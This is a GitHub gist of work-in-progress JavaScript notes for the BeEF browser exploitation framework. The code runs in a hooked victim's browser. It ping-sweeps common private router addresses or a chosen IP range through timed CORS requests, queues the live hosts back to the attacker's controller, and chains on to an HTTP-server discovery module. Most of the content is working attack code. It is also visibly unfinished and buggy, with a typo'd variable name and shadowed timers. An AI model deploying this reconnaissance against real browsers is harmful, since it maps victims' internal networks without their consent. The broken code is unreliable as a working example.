Skip to content

Instantly share code, notes, and snippets.

@xntrik

xntrik/dormant dom notes - wip hacky stuff.js

Created August 6, 2017 03:20
Show Gist options
  • Save xntrik/4e5dfd77f1f69ad580d7a33938e19252 to your computer and use it in GitHub Desktop.
Save xntrik/4e5dfd77f1f69ad580d7a33938e19252 to your computer and use it in GitHub Desktop.
Download ZIP
notes on the BeEF dormant domination work
Raw
dormant dom notes - wip hacky stuff.js
var ping_sweep_68a01c7d83 = function(mod_input){
beef.execute(function() {
var ips = new Array();
var rhosts = mod_input;
var threads = parseInt("6", 10) || 3;
var timeout = 1000;
if(!beef.browser.hasCors()) {
beef.aredormanthelpers.queue('/command/ping_sweep.js', 1, 'fail=Browser does not support CORS', beef.are.status_error());
return;
}
// set target IP addresses
if (rhosts == 'common') {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = rhosts.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.aredormanthelpers.queue("/command/ping_sweep.js", 1, "fail=malformed IP range supplied", beef.are.status_error());
return;
}
ipBounds = rhosts.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (var i = lowerBound; i <= upperBound; i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
WorkerQueue = function(frequency) {
var stack = [];
var timer = null;
var frequency = frequency;
var start_scan = (new Date).getTime();
this.process = function() {
var item = stack.shift();
eval(item);
if (stack.length === 0) {
clearInterval(timer);
timer = null;
var interval = (new Date).getTime() - start_scan;
beef.debug("[Ping Sweep] Worker queue is complete ["+interval+" ms]");
return;
}
}
this.queue = function(item) {
stack.push(item);
if (timer === null) timer = setInterval(this.process, frequency);
}
}
// create workers
var workers = new Array();
for (w=0; w < threads; w++) workers.push(new WorkerQueue(timeout));
beef.debug("[Ping Sweep] Starting scan ("+(ips.length)+" URLs / "+threads+" workers)");
for (var i=0; i < ips.length; i++) {
var worker = workers[i % threads];
var ip = ips[i];
// use a high port likely to be closed/filtered (60000 - 65000)
var port = Math.floor(Math.random() * 5000) + 60000;
worker.queue('var start_time = new Date().getTime();' +
'beef.net.cors.request(' +
'"GET", "https://'+ip+':'+port+'/", "", '+timeout+', function(response) {' +
'var current_time = new Date().getTime();' +
'var duration = current_time - start_time;' +
'if (duration < '+timeout+') {' +
'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- host is up");' +
'beef.aredormanthelpers.queue("/command/ping_sweep.js", 1, "ip='+ip+'&ping="+duration+"ms", beef.are.status_success());' +
'} else {' +
'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- timeout");' +
'}' +
'});'
);
}
});
};
var ping_sweep_68a01c7d83_can_exec = false;
var ping_sweep_68a01c7d83_mod_output = null;
function outer_sequential_68a01c7d83(stealthLevel){
function ping_sweep_68a01c7d83_f(){
//CODE
//var s=mod_input.split('.');
//var start = s[0]+'.'+s[1]+'.0.67';
//var end = s[0]+'.'+s[1]+'.0.71';
//var mod_input = start+'-'+end;
mod_input = "";
var s=outer_sequential_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.117'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.120'; var mod_input = start+'-'+end;
ping_sweep_68a01c7d83(mod_input);
if (stealthLevel > 1) {
// manually pop beef modules because we killed the timer
while(beef.commands.length > 0) {
command = beef.commands.pop();
try {
command();
} catch(e) {
beef.debug('dormant - failed to execute ' + e.message);
beef.debug(command.toString());
}
}
} /* CF MOD FROM HERE */
function isResReady(mod_result, start){
if (mod_result === null && parseInt(((new Date().getTime()) - start)) < 5000){
// loop
}else{
// module return status/data is now available
clearInterval(resultReady);
if (mod_result === null && true){
var mod_result = [];
mod_result[0] = 1; //unknown status
mod_result[1] = '' //empty result
}
var status = mod_result[0];
if(status==1){
get_http_servers_5d82b59a5c_can_exec = true;
ping_sweep_68a01c7d83_mod_output = mod_result[1];
// END OF THE FIRST ITERATION OF ADDING CONTENT TO
// delayed_exec
// START OF LAST ITERATION (else) OF ADDING CONTENT TO
// delayed_exec
function get_http_servers_5d82b59a5c_f(){
if(get_http_servers_5d82b59a5c_can_exec){
var s=ping_sweep_68a01c7d83_mod_outpu .split('.');
var start = s[0]+'.'+s[1]+'.1.89';
var end = s[0]+'.'+s[1]+'.1.91';
var mod_input = start+'-'+end;
get_http_servers_5d82b59a5c(mod_input);
}
}
get_http_servers_5d82b59a5c_f();
// END OF LAST ITERATION (else) OF ADDING CONTENT TO
// delayed_exec
// START OF FIRST ITERATION OF ADDING delayed_exec_footer
}
}
}
var start = (new Date()).getTime();
var resultReady = setInterval(function() {
var start = (new Date()).getTime();
isResReady(ping_sweep_68a01c7d83_mod_output, start);
},300);
/* CF MOD END HERE */
}
ping_sweep_68a01c7d83_f();
}
are_68a01c7d83 = new Beefaredormant(2, 1);
are_68a01c7d83.outer_sequential = outer_sequential_68a01c7d83;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment